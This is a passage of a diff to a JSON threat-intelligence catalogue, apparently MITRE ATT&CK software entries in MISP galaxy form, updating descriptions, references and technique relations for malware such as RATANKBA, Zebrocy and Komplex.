[APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)", "meta": { "external_id": "S0213", "mitre_platforms": [ @@ -11887,7 +13636,7 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11899,6 +13648,27 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0852567d-7958-4f4b-8947-4f840ec8d57d", @@ -11981,8 +13751,7 @@ ], "refs": [ "https://attack.mitre.org/software/S0241", - "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ratankba-watering-holes-against-enterprises/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" ], "synonyms": [ "RATANKBA" @@ -11990,63 +13759,7 @@ }, "related": [ { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12059,6 +13772,13 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -12067,7 +13787,28 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12088,14 +13829,42 @@ "type": "uses" }, { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12106,7 +13875,7 @@ "value": "RATANKBA - S0241" }, { - "description": "[Happywork](https://attack.mitre.org/software/S0214) is a downloader used by [ScarCruft](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)", + "description": "[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)", "meta": { "external_id": "S0214", "mitre_platforms": [ @@ -12184,21 +13953,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12212,7 +13967,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12226,14 +13981,28 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12267,14 +14036,14 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12295,21 +14064,7 @@ "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12321,6 +14076,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "b96680d1-5eb3-4f07-b95c-00ab904ac236", @@ -12356,6 +14125,13 @@ ], "type": "uses" }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -12369,13 +14145,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "3c02fb1f-cbdb-48f5-abaf-8c81d6e0c322", @@ -12425,6 +14194,13 @@ ], "type": "uses" }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ @@ -12439,13 +14215,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -12497,104 +14266,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -12602,62 +14273,6 @@ ], "type": "uses" }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b8c5c9dd-a662-479d-9428-ae745872537c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -12665,6 +14280,34 @@ ], "type": "uses" }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ @@ -12673,7 +14316,91 @@ "type": "uses" }, { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12687,7 +14414,49 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b8c5c9dd-a662-479d-9428-ae745872537c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12698,7 +14467,7 @@ "value": "Remsec - S0125" }, { - "description": "[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan used by [APT28](https://attack.mitre.org/groups/G0007). [Zebrocy](https://attack.mitre.org/software/S0251) was seen used in attacks in early 2018. [Zebrocy](https://attack.mitre.org/software/S0251) comes in several programming language variants, including C++, Delphi, and AutoIt. (Citation: Palo Alto Sofacy 06-2018)", + "description": "[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, and VB.NET. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)", "meta": { "external_id": "S0251", "mitre_platforms": [ @@ -12706,20 +14475,15 @@ ], "refs": [ "https://attack.mitre.org/software/S0251", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", + "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" ], "synonyms": [ "Zebrocy" ] }, "related": [ - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -12734,12 +14498,152 @@ ], "type": "uses" }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "a4f57468-fbd5-49e4-8476-52088220b92d", @@ -12832,14 +14736,14 @@ "type": "uses" }, { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12853,14 +14757,14 @@ "type": "uses" }, { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12887,7 +14791,14 @@ }, "related": [ { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12901,28 +14812,14 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12943,7 +14840,14 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12954,7 +14858,7 @@ "value": "Catchamas - S0261" }, { - "description": "[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX) (Citation: Sofacy Komplex Trojan).", + "description": "[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).", "meta": { "external_id": "S0162", "mitre_platforms": [ @@ -13012,13 +14916,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -13027,7 +14924,7 @@ "type": "uses" }, { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13047,6 +14944,13 @@ ], "type": "uses" }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -13088,13 +14992,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -13103,14 +15000,7 @@ "type": "uses" }, { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13123,6 +15013,13 @@ ], "type": "uses" }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": 